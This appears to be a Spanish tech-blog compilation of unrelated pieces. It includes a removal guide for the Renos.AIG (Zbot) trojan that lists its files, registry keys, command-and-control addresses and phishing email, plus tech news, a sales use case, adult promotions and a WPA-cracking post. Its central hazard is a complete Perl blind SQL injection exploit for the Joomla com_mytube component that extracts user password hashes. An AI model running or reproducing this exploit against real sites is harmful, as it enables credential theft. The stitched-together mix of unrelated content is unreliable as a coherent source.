Renos.AIG (Peligrosidad: 1 - Mínima)

Troyano que descarga archivos al equipo infectado y modifica el registro.

*Si utiliza Windows Me, XP o Vista, y sabe cuándo se produjo la infección, puede usar la característica de ‘Restauración del Sistema’ para eliminar el virus volviendo a un punto de restauración anterior a la infección (tenga en cuenta que se desharán los cambios de configuración de Windows y se eliminarán todos los archivos ejecutables que haya creado o descargado desde la fecha del punto de restauración). Si tiene alguna duda o problema sobre el funcionamiento de esta opción puede consultar nuestras guías sobre la Restauración en Windows XP o la Restauración en Windows Vista.

* En caso de que no pueda volver a un punto de Restauración anterior o no le funcione, es recomendable que desactive temporalmente la Restauración del Sistema antes de eliminar el virus por otros medios, ya que podría haberse creado una copia de seguridad del virus. Si necesita ayuda vea Deshabilitar restauración del sistema en Vista, XP y Me. A continuación siga estos pasos para la eliminación del virus:

1. Reinicie su ordenador en Modo Seguro o Modo a Prueba de Fallos. Si no sabe cómo se hace siga las instrucciones que se indican en este manual de Cómo iniciar su computadora en Modo a prueba de fallos.

2. Con un antivirus actualizado, localice todas las copias del virus en el disco duro de su PC. Si no dispone de antivirus, visite nuestra página de Antivirus gratuitos.

Elimine la siguiente carpeta:
o %System%\wsnpoem.

Elimine los siguientes ficheros:
o %System%\ntos.exe
o %System%\wsnpoem\audio.dll
o %System%\wsnpoem\video.dll

Nota:%System% es una variable que hace referencia al directorio del sistema de Windows.
Por defecto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

Nota: A Menudo los antivirus informan de que 'no puede reparar un fichero' en el caso de gusanos o troyanos debido a que no hay nada que reparar, simplemente hay que borrar el fichero.

3. Si no se puede reparar la infección o borrar los ficheros, puede ser debido a que el fichero está en uso por estar el virus en ejecución (residente en memoria).
En el caso de que no se pueda eliminar el fichero del virus, debe terminar manualmente el proceso en ejecución del virus. Abra el Administrador de Tareas (presione Control+Mayúsculas+Esc). En Windows 98/Me seleccione el nombre del proceso y deténgalo. En Windows 2000/XP/Vista, en la pestaña 'Procesos' pulse con el botón derecho en el proceso y seleccione 'Terminar Proceso'. A continuación vuelva a intentar el borrado o reparación de los ficheros que se han creado por la acción del virus. Puede obtener más información en la sección "Administrador de Tareas", de la página Eliminar librerías .DLL o .EXE.

4. A continuación hay que editar el registro para deshacer los cambios realizados por el virus. Si necesita información sobre cómo editar el registro puede ver esta guía de edición del registro. Sea extremadamente cuidadoso al manipular el registro. Si modifica ciertas claves de manera incorrecta puede dejar el sistema inutilizable.

Elimine las siguientes claves del registro y todo su contenido:

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{19127AD2-394B-70F5-C650-B97867BAA1F7}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{4B19E1F3-5B47-C615-C75A-E0FD63DB477F}\

Elimine la siguiente entrada del registro:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network
Valor:UID = "{nombre del equipo}_{números aleatorios}"

Restaure la siguiente entrada del registro al valor que tuviese anteriormente, a continuación se indica su valor por defecto:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Valor:Userinit = "%System%\Userinit.exe,"

5. Elimine todos los archivos temporales del ordenador, incluidos los archivos temporales del navegador, vacíe también la Papelera de reciclaje.

6. Reinicie su ordenador y explore todo el disco duro con un antivirus para asegurarse de la eliminación del virus. Si desactivó la restauración del sistema, recuerde volver a activarla. Cree un punto de restauración, le resultará útil para recurrir a él en caso de posibles infecciones o problemas en el futuro.

Nombre completo: Trojan.W32/Renos.AIG
Tipo: [Trojan] - Caballo de Troya: programa que parece beneficioso o útil pero resulta ser malicioso en algún momento. No se propaga por sí mismo.
Plataforma: [W32] - Ejecutable PE (.EXE, .SCR, .DLL) que corre en Windows de 32 bits: 95, 98, Me, NT, 2000, XP, 2003
Tamaño (bytes): 73216 Alias:TROJ_RENOS.AIG (Trend Micro), TR/Spy.ZBot.DFO (AVIRA), Trojan.Spy.Wsnpoem.GT (Bit Defender), TrojanSpy.Zbot.edw (Quick Heal), Trojan.Zbot-1962 (ClamAV), Trojan.Proxy.3747 (Doctor Web), Trojan-Spy.Win32.Zbot.edw (F-Secure), Trojan-Spy.Win32.Zbot.edw (Kaspersky), Win32/Spy.Agent.PZ (ESET), W32/Zbot.AXQ (Norman), Mal/EncPk-CZ (Sophos), W32/Downldr2.DIHS (Otros), Win32/Kollah.NW (Computer Associates), W32/Zbot.ED!tr.spy (Otros), Win32.Outbreak.Fedex4711 (Otros), Trojan:Win32/Zbot.BF (Otros), Trojan.Win32.Ntos.je (Otros), Trojan-Spy.Win32.Zbot.edv (Otros), TrojanSpy.Zbot.TI (Otros), Trojan.Spy.ZBot.DFO (Otros), Agent.AADX (Otros), Email.Trojan.GZC (ClamAV), Agent.AADX (AVG), Win32.Outbreak.Fedex4711.DL (Otros), Trojan-Spy.Zbot.EDW (K7 Computing)


Método de Infección/Efectos

Cuando se ejecuta crea la carpeta %System%\wsnpoem.

Nota:%System% es una variable que hace referencia al directorio del sistema de Windows.
Por defecto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

Descarga una copia de sí mismo en %System%\ntos.exe. También descarga los siguientes archivos no maliciosos:

* %System%\wsnpoem\audio.dll
* %System%\wsnpoem\video.dll

Modifica la siguiente entrada del registro para ejecutarse en cada arranque del sistema:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Valor:Userinit = "%System%\Userinit.exe,%System%\ntos.exe,"

También crea las siguientes claves y entradas en el registro:

Clave:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network
Valor:UID = "{nombre del equipo}_{números aleatorios}"

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{19127AD2-394B-70F5-C650-B97867BAA1F7}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}\

Clave:HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer
\{4B19E1F3-5B47-C615-C75A-E0FD63DB477F}\

Abre un puerto TCP aleatorio para conectarse con la siguiente dirección de Internet:

* http://blatundalqik.ru/[-eliminado-]rev.bin

Accede a la siguiente dirección de Internet para descargarse otros programas maliciosos:

* http://66.199.242.115

Método de Propagación

Carece de rutina propia de propagación. Suele llegar al sistema como adjunto de un falso correo en inglés que informa de que no se ha podido enviar un paquete. El mensaje tiene las siguientes características:

Remitente: Falsificado

Asunto: "Fedex tracking number 2344492918"

Cuerpo del mensaje:

Unfortunately we were not able to deliver postal package you sent on
August the 1st in time because the recipient’s address is not correct.

Please print out the invoice copy attached and collect the package at our office



Your FEDEX.com

Adjunto: ZD76128824.Zip
Dentro de este archivo se encuentra comprimido el fichero WD6128922.Exe, que contiene una copia del gusano. En caso de que un usuario abra el archivo comprido y ejecute el gusano, se quedará infectado.

Nombres de Ficheros Adjuntos (virus que llegan por correo)

* ZD76128824.Zip

Asunto del mensaje (virus que llegan por correo)

* Fedex tracking number 2344492918

Más información acerca de este virus en:

* Trend Micro
* AVIRA
* K7 Computing

joomla component com_mytube (user_id) Blind SQL Injection Vulnerability

#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#---------------------------------------------------------------------------


#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";


print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";


$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

$d=0;


for ($idusuario=62;$idusuario<=80;$idusuario++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

}

print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print " [-] # Usuario que desea extraer : ";chomp($iduss=);

for ($x=1;$x<=32;$x++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;} if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;


if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}


}
else
{

for ($c=48;$c<=57;$c++) { $host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null"; my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}


}

}

print " [+] Password :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}

# milw0rm.com [2009-09-21]

Google Maps Y Street View ahora en Mexico

A partir del 9 de Noviembre estará disponible en las principales ciudades de México Google Street View. Las ciudades con las que dará inicio Google Street View México son la ciudad de México, Guadalajara, Puebla, Monterrey, Cancún, Puerto Vallarta y la Rivera Maya. “México es el primer país en América Latina en tener Street View con información de la Ciudad de México, Monterrey, Guadalajara, Puebla, Cancún y la Riviera Maya y Puerto Vallarta”, declaró Miguel Angel Alva, director de Mercadotecnia de Google México. Como en las versiones europeas los negocios podrán incluir información en los mapas del país. Ademas Google anunció la llegada de Google Maps a México lo que permitirá a restaurantes, museos, parques y empresas cargar su información a google para que los usuarios puedan locarlizarlos facilmente en el mapa. Segun Miguel Angel Alba director de Mercadotecnia de México la idea es proveer al usuario de suficiente información para tomar acciones sobre que actividades pueden visitar en todo México. Esto fue algo que dijo Miguel en la conferencia impartida en Septiembre pasado en Mérida y que por fin se hace realidad al menos paulatinamente. Esperemos pronto ver a todas las ciudades de México en Google Street View y en los mapas de Google México.

Incompatibles Windows 7 y iPhone

Se avisará a los usuarios para una pronta actualización y no tener problemas NUEVA YOYK, EU.- La gran popularidad de iPhone ha llegado hasta a los PCs, tanto que su uso es mayoritario para pasar datos desde el PC al teléfono con iTunes.

Por ahora parece haber problemas con Windows 7, aunque se ha visto en algunos casos y no en la mayoría de ordenadores con este SO.

Muchos usuarios están optando por comprar un ordenador de sobremesa o un portátil con este nuevo sistema operativo y muchos de ellos disponen de un terminal iPhone.

Al parecer el problema entre Windows 7 y iPhone proviene del chipset de Intel P55 Express USB, el cual nos lleva a un error ( 0xE8000065 ), siempre que el usuario intente sincronizar casi cualquier archivo.

Desde EngadgetMobile aconsejan utilizar un PCI interno USB que no sea del fabricante californiano, cosa que arreglará el problema en cuestión de apenas unos minutos. Intel ya está intentado solucionar este fallo y problema que les tiene trabajando desde hace unas semanas y que posiblemente llegue en los próximos días.

Se avisará a los usuarios para una pronta actualización del mismo y no tener problemas de transferir datos desde Windows 7 a iPhone.

Via Informador

Facebook tendrá su 'cementerio'

La popular red social ha decidido tener en cuenta un punto controvertido, que no es más que la muerte real de sus usuarios. Hasta el momento no había decisión sobre qué hacer con sus perfiles, pero parece que ya tienen solución. Debido a la posibilidad y problemas de seguridad, bromas de mal gusto, etcétera, Facebook comprobará legalmente la muerte de sus usuarios y han desarrollado la idea de "perfil conmemorativo" para que de manera privada la gente allegada recuerde al usuario.



Facebook ya dispone de más de 300 millones de usuarios alrededor del mundo y ha anunciado un espacio dedicado a la memoria de los usuarios que pasen a mejor vida. Es lo que han denominado "perfiles conmemorativos".

En palabras de Max Kelly, responsable de seguridad de Facebook: "Cuando alguien nos deja, no abandona ni nuestra memoria ni nuestra red social [...] Para reflejar esta realidad hemos creado la idea de 'perfiles conmemorativos' como un lugar donde la gente puede guardar y compartir los recuerdos de aquellos que han fallecido".



Dichos perfiles serán privados y por tanto habrá que ofrecer a Facebook una prueba fehaciente de la muerte del usuario si queremos que nuestro allegado / familiar / amigo disponga de este tipo de perfil. Facebook también se ofrece el servicio de retirar toda la información del usuario si la familia quiere para evitar el mal trago.

Via Muycomputer.com

Triunfo "twittero" sobre los impuestos

En un hecho sin precedentes en México, tras la presión ejercida en una red social, este fin de semana el Congreso rechazó el impuesto para gravar el uso de internet con 3% que sería aplicado según el Paquete Fiscal 2010.

Los legisladores reconocieron que la decisión respondió a la presión del movimiento #Internet Necesario generado en la red social Twitter.

Durante la sesión, el senador de la oposición Francisco Castellón Fonseca, presidente de la Comisión de Ciencia y Tecnología, subió a tribuna para rechazar este gravamen.

"Tasar las telecomunicaciones nos parece una barbaridad; nos parece un atentado en contra del avance, no solamente científico y técnico, sino también del avance social. Tasar las telecomunicaciones es ahondar la brecha de la disponibilidad de la tecnología entre los sectores de altos ingresos y de bajos ingresos", aseguró.

La exención, sin embargo, no incluye los servicios de telefonía ni televisión por cable.

Caso de USO UC1: Procesar Venta

Caso de USO UC1: Procesar Venta

Actor principal: Cajero

Personal involucrado e intereses:

Cajero: quiere entradas, precisas, rápidas, y sin errores de pago, y
que las pérdidas las deducen de su salario.

Vendedor: quiere que las comisiones de las ventas estén actualizadas.

Compañía: Quiere registrar las transacciones con precisión y satisfacer los intereses de los clientes. Quiere asegurar que se registran los pagos aceptados por el Servicio de Autorización de Pagos. Quiere cierta tolerancia a fallos que permita capturar las ventas incluso si los componentes del servidor (p.ej. validación remota de crédito) no están disponibles. Quiere actualización automática y rápida de la contabilidad y el inventario.

Agencia Tributaria del Gobierno: quiere recopilar los impuestos de cada venta. Podrían ser múltiples agencias: nacional, provincial y local.

Servicio de Autorización de Pagos: Quiere recibir peticiones de autorización digital con el formato y protocolo correctos. Quiere registrar de manera precisa las cuentas por cobrar de la tienda.

Precondiciones: El cajero se identifica y autentica.

Postcondiciones: Se registra la venta. El impuesto se calcula de una manera correcta. Se actualizan la contabilidad y el inventario. Se registran las comisiones. Se genera el recibo. Se registran las autorizaciones de pago aprobadas.

Escenario principal de éxito (o Flujo Básico)
1. El Cliente llega a un terminal PDV con mercancías y/o servicios que comprar.
2. El Cajero comienza una nueva venta.
3. El Cajero introduce el identificador del artículo.
4. El Sistema registra la línea de la venta y presenta la descripción
del artículo, precio y suma parcial. El precio se calcula a partir de un conjunto de reglas de precios.
El Cajero repite los pasos 3-4 hasta que se indique.
5. El Sistema presenta el total con los impuestos calculados.
6. El Cajero le dice al Cliente el total y pide que le pague.
7. El Cliente paga y el Sistema gestiona el pago.
8. El Sistema registra la venta completa y envía la información de la venta y el pago al Sistema de Contabilidad externo (para la contabilidad y las comisiones) y al Sistema de Inventario (para actualizar el inventario).
9. El Sistema presenta el recibo.
10. El Cliente se va con el recibo y las mercancías (si es el caso).

Extensiones (o Flujos Alternativos):
*a. En cualquier momento el Sistema falla:
Para dar soporte a la recuperación y registro correcto, asegura que todos los estados y eventos significativos de una transacción puedan recuperarse desde cualquier paso del escenario.
1. El Cajero reinicia el Sistema, inicia la sesión, y solicita la recuperación al estado anterior.
2. El Sistema reconstruye el estado anterior.
2a. El Sistema detecta anomalías intentando la recuperación:
1. El Sistema informa del error al Cajero, registra el error, y pasa
a un estado limpio.
2. El Cajero comienza una nueva venta.

3a. Identificador no válido:
1. El Sistema señala el error y rechaza la entrada.

3b. Hay muchos artículos de la misma categoría y tener en cuenta la única identidad del artículo no es importante (ej. 5 paquetes de hamburguesas vegetales):
1. El Cajero puede introducir el identificador de la categoría del artículo y la cantidad.

3-6a. El Cliente le pide al Cajero que elimine un artículo de la compra:
1. El Cajero introduce el identificador del artículo para eliminarlo de la compra.
2. El Sistema muestra la suma parcial actualizada.
3-6b. El Cliente le pide al Cajero que cancele la venta:
1. El Cajero cancela la venta en el Sistema.
3-6c. El Cajero detiene la venta:
1. El Sistema registra la venta para que esté disponible su recuperación en cualquier terminal PDV.

4a. El Sistema genera el precio de un artículo pero no es el deseado (ej. el Cliente se queja por algo y se le ofrece un precio más bajo):
1. El Cajero introduce el precio alternativo.
2. El Sistema presenta el precio nuevo.

5a. El Sistema encuentra algún fallo para comunicarse con el servicio externo del sistema de cálculo de impuestos.
1. El Sistema reinicia el servicio con el nodo PDV y continúa.
1a. El Sistema detectar que el servicio no reinicia.
1. El Sistema señala el error.
2. El Cajero podría calcular e introducir maualmente el
impuesto, o cancelar la venta

5b. El Cliente dice que le son aplicables descuentos (ej. empleado, cliente preferente):
1. El Cajero señala la petición de descuento.
2. El Cajero introduce la identificación del Cliente.
3. El Sistema presenta el descuento total, basado en las reglas de descuento.

5c. El Cliente dice que tiene crédito en su cuenta, para aplicar a la venta:
1. El Cajero señala la petición de crédito.
2. El Cajero introduce la identificación del Cliente.
3. El Sistema aplica el crédito hasta que el precio = 0, y reduce el
crédito que queda.

6a. El Cliente dice que su intención era pagar en efectivo pero no tiene suficiente:
1a. El Cliente utiliza un método de pago alternativo.
1b. El Cliente le dice al Cajero que cancele la venta. El Cajero cancela la venta en el Sistema.

7a. Pago en efectivo:
1. El Cajero introduce la cantidad de dinero en efectivo entregada.
2. El Sistema muestra la cantidad de dinero a devolver y abre el cajón de caja.
3. El Cajero deposita el dinero entregado y devuelve el cambio al Cliente.
4. El Sistema registra el pago en efectivo.

7b. Pago a crédito:
1. El Cliente introduce la información de su cuenta de crédito.
2. El Sistema envía la petición de autorización del pago al Sistema externo de Servicoi de autorización de Pagos, y solicita la aprobación del pago.

2a. El Sistema detecta un fallo en la colaboración con el sistema externo:
1. El Sistema señala el error al Cajero.
2. El Cajero le pide al Cliente un modo de pago alternativo.
3. El Sistema recibe la aprobación del pago y lo notifica al Cajero.
3a. El Sistema recibe la denegación del pago:
1. El Sistema señala la denegación al Cajero.
2. El Cajero le pide al Cliente un modo de pago alternativo.
4. El Sistema registra el pago a crédito, que incluye la aprobación
del pago.
5. El Sistema presenta el mecanismo de entrada para la firma del pago a crédito.
6. El Cajero pide al Cliente que firme el pago a crédito. El Cliente introduce la firma.

7c. Pago con Cheque

7d. Pago a Cuenta

7e. El Cliente presenta cupones

9a. Hay rebajas en los artículos

9b. El Cliente solicita un vale-regalo

Requisitos especiales:
- Interfaz de Usuario con Pantalla fácil en un gran monitor de pantalla plana. El texto debe ser visible a un metro de distancia.
- Tiempo de respuesta para la autorización del crédito de 30 segundos el 90% de las veces.
- De algún modo, queremos recuperación robusta cuando falla el acceso a servicios remotos como el sistema de inventario.
- Internacionalización del lenguaje de texto que se muestra.
- Reglas de negocio que se puedan añadir en tiempo de ejecución en los
pasos 3 y 7 ...

Lista de tecnología y variaciones de datos:
3a. El identificador del artículo se introduce mediante un escáner láser de código de barras (si está presente el código de barras) o a través del teclado.
3b. El identificador del artículo podría ser cualquier esquema de código UPC, EAN, JAN o SKU.
7a. La entrad de la información de la cuenta de crédito se lleva a cabo mediante un lector de tarjetas o el teclado.
7b. La firma de los pagos a crédito se captura en un recibo de papel.
Pero en dos años pronosticamos que muchas clientes querrán que se capture la firma digital.

Frecuencia
Podría ser casi continuo.

Temas abiertos:
- Cuáles son las variaciones de la ley de impuestos?
- Explorar las cuestiones de recuperación de servicios remotos.
- Cuál es la adaptación que se tiene que hacer para diferentes negocios?
- Un cajero debe llevarse el dinero de la caja cuando salga del sistema?
- Puede utilizar el cliente directamente el lector de tarjetas o tiene
que hacerlo el cajero?

Desde el antro roxy en vivo todas las noches

Ver el antro Roxy y las rolas del djpenetrate
Todas las noches transmision En vivo desde el antro roxy, chica en table dance y dj!

Fotos de chicas hermosas

Hola, uno de mis proyectos es TopMetroflog en el cual hay gran cantidad de chicas con su correspondiente URL de flog o email, he dedicado varias horas en subir material; y estoy buscando colaboradores que gusten participar en el proyecto, subiendo material principalmente y si desean ir aprendiendo php como lo estoy haciendo yo, bienvenidos sean.

Por lo pronto, quiero implementar un sistema de votación de imágenes aleatorias, donde el usuario vea una foto y le de su calificación de 1 a 5, no es original pero qué les parece?

Bueno, la página es esta:

http://topmetroflog.site40.net

http://topmetroflog.tk

Keteke, símbolo de fracaso

La red social lanzada por Telefónica a finales del 2008, Keteke, fracasó en su intento de convertirse en la red social “de referencia” ya que sólo un 0,36 por ciento de los internautas la utilizan, lo que supone un “gran fiasco” para la compañía, según revela una encuesta realizada por la red de blogs Ocio Networks entre 2.075 españoles. [Fuente: NoticiasDot]

Se invirtió mucho en publicidad y sin embargo no ha tenido éxito este proyecto, con lo que podemos concluir que la publicidad no siempre nos asegura que los usuarios vendrán a nuestros sitios web, yo pienso que quisieron imitar algo que ya estaba hecho, redes como facebook, myspace y hi5 acaparan la mayoria de los usuarios. Pueden aprocechar el protencial y los usuarios que ya tienen mejorando lo que tienen y ofrecer un servicio de calidad, con menos publicidad que su competencia y mejores herramientas de comunicación entre sus usuarios.

Bueno, ojo a la hora de crear proyectos, no les vaya a pasar lo que a keteke...

Soporte

Sobre el video de demostración de crack al wpa2

Hola a todos, me han estado llegando muchos correos y mensajes a la cuenta q tengo en youtube sobre los videos que prometí donde se demuestra que el cifrado wpa ya pasó a ser historia al igual que el cifrado wep. Sin embargo la falta de tiempo por el trabajo y los proyectos escolares no me han permitido realizarlos.

Les tengo buenas noticias, está comprobadísimo que estos cifrados son desencriptables y las clases se pueden obtener. Sin embargo, para poder hacer un video real de un punto de acceso victima real como los que demostre en los tres videos:

http://alfonsocruz.blogspot.com/2008/06/cmo-usar-airodump-ng-by-soporte-1-de-3.html
http://alfonsocruz.blogspot.com/2008/06/cmo-usar-aireplay-ng-by-soporte-2-de-3.html
http://alfonsocruz.blogspot.com/2008/06/cmo-usar-aircrack-ng-by-soporte-3-de-3.html


Para los que deseen apoyar esta pequeña pero sin embargo hasta cierto punto útil realización de los videos, hagan alguna donación a traves de PAYPAL con alguna cantidad para comprar un router inalámbrico y hacer posible este proyecto una realidad. Asi mismo, invito a todas aquellas personas que deseen unirse o aportar algo con algún material, me lo hagan llegar y con gusto lo publicaré en este su blog.



Gracias, seguiremos en contacto.

Un carro volador, Terrafugia Transition

Desde que el hombre se quedó atascado en el terrible tráfico, ha soñado con la manera de salir de esa situación, y al parecer lo ha logrado. Pues ha presentado al primer carro volador: Terrafugia Transition, que ha hecho la prueba y ha despegado.

Terrafugia, una empresa estadounidense de aviación, lanzó el primer carro volador. El Transition es un vehículo que funciona con gasolina común y corriente y puede ser conducido por una calle cualquiera. Sin embargo, cuando el conductor arriba a la pista de un aeropuerto despliega sus alas en tan sólo 30 segundos, acelera hasta un poco más de 250 kilómetros por hora y despega.

El carro volador cuenta con dos asientos y tiene una autonomía de vuelo de más de 700 kilómetros. Cuando el piloto aterriza puede manejar tranquilamente hasta su casa y parquear su carro en el garaje, puesto que, con las alas dobladas, tiene apenas dos metros de ancho.

Y que hay del precio? El precio rondará los 148 mil dólares, por ahora solo se pueden hacer reservas en el sitio: www.terrafugia.com, además de que puedes ver más detalles del vehiculo volador.

El precio del aparato rondará los148 mil dólares, y ya es posible hacer reservas desde la página web de Terrafugia Transition, donde además podéis conocer más información acerca del vehículo aereo.

Sitio web

Un dispositivo para mirar por las paredes

Orientado a fuerzas de seguridad y militares, los equipos Xaver fueron presentados en la Argentina por Motorola. Se trata de un radar que genera imágenes de lo que sucede del otro lado de una pared

Con un peso de 15 kilos, el modelo Xaver 400 puede ser transportado dentro de un bolso. El equipo es un desarrollo de la empresa Camero, donde Motorola tiene una fuerte participación accionaria.

El objetivo del dispositivo es brindar a fuerzas policiales y militares una ventaja operativa, pudiendo confirmar áreas seguras y evitar sorpresas en operaciones de rescate de rehenes, asaltos, entradas con explosivos y capturas de alto riesgo, por ejemplo.

Este dispositivo identifica seres vivos, los cuales aparecen nítidamente como imágenes en 3-D en la versión portátil y, en 2-D, en la versión normal del producto.

Información tal como el número de personas con vida, la ubicación física y eventuales cambios de posición (sentado, parado, etc.) pueden ser fácilmente identificados con el dispositivo, el cual también permite diferenciar la presencia de adultos, niños y animales, o bien detectar si una persona está inconciente.

No obstante, en el caso de víctimas fatales, el equipo las identifica como si fueran un objeto normal y sin vida dentro del recinto observado.

“La información suministrada por el equipo es muy importante para el análisis en tiempo real, permitiendo a los oficiales de policía o militares tomar la decisión correcta en situaciones de alto riesgo, en especial las que involucran rehenes o grupos armados”, afirmó Pablo Orsei, country Manager de Motorola Argentina.
El dispositivo sólo se venderá a las fuerzas policiales o militares y ya es utilizado en los cinco continentes.

En el video puede mirarse en funcionamiento el modelo 800, con más amplitud de visión.

Crean una pintura anti Wi-Fi para que nadie se "cuelgue"

El invento es de la Universidad de Tokio. El objetivo es aumentar la seguridad

Los investigadores de la Universidad de Tokio crearon un tipo de pintura especial que sirve para bloquear las señales inalámbricas como el Wi-Fi o las de los teléfonos móviles.

Según publica BBC , el primer uso que plantean está relacionado con la seguridad: evitar que las señales de internet del hogar o de la oficina «salgan fuera» de una habitación, o que desde el exterior alguien pueda «escucharlas» y comprometer su seguridad.

La idea es que ninguna red pueda ser violada, ya que hoy en día incluso las que están bloqueadas con contraseña pueden ser vulneradas por expertos en cuestión de minutos en muchas ocasiones, dependiendo del tipo de cifrado seguro que utilicen.

Empleando esta pintura, las señales simplemente no llegan al exterior, con lo que se soluciona en parte el problema.

El otro posible uso es el de bloqueo de las señales exteriores, por ejemplo las de los teléfonos móviles, en lugares públicos como los cines o teatros, donde no se desea que suenen de repente y molesten a la gente. Es algo que actualmente se consigue mediante revestimientos especiales en las paredes.

El mismo efecto se podría lograr con una variante de la pintura que han inventado, que bloquearía ciertas frecuencias empleadas por los móviles, cercanas al rango de las del Wi-Fi.

El FIFA 2010 ya es récord en Europa

Se vendieron 1,7 millones de copias del videojuego en apenas siete días. Su gran rival, el Pro Evolution Soccer 2010, recién comienza a venderse la semana próxima

El presidente de la división EA Sports, Peter Moore, se mostró convencido de que el producto será un éxito. “Esta semana fans de toda Europa mostraron cuánto les gusta este juego. Estamos muy orgullosos del gran recibimiento que tuvo", explicó el directivo en un comunicado de prensa.

Simultáneamente al éxito en ventas, se alcanzó además un récord en cuanto a partidos online: más de 155 mil usuarios al mismo tiempo.

EA Sports es la principal marca de software interactivo de deportes en el mundo, incluyendo títulos y franquicias líderes en venta como Madden NFL football, FIFA, NHL hockey, NBA LIVE basketball, NCAA Football y Tiger Woods PGA TOUR.